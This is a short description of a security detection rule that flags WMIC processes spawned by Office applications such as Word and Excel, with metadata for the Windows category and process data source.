
Summary
This rule identifies suspicious WMIC (Windows Management Instrumentation Command-line) executions initiated by common Office applications such as Word, Excel, PowerPoint, and others. Attackers often leverage WMIC through legitimate Office processes to obscure their malicious activities and evade detection. The rule is designed to detect instances where an Office application calls WMIC, which can indicate an attempt to execute malicious commands or code, often as part of a broader attack involving techniques such as process instantiation or code injection. By analyzing the parent-child relationship of processes, this rule focuses on the scenario where Office software spawns WMIC as a child process, which is a known tactic among threat actors to obscure their activities and avoid potential defenses. The detection logic is strict, requiring both parent and WMIC characteristics to match specified criteria related to the execution context and command line arguments to confirm a potential threat. As such, this rule aids in the proactive detection of malicious activity attempting to masquerade behind trusted applications.
Categories
- Windows
Data Sources
- Process
Created: 2021-08-23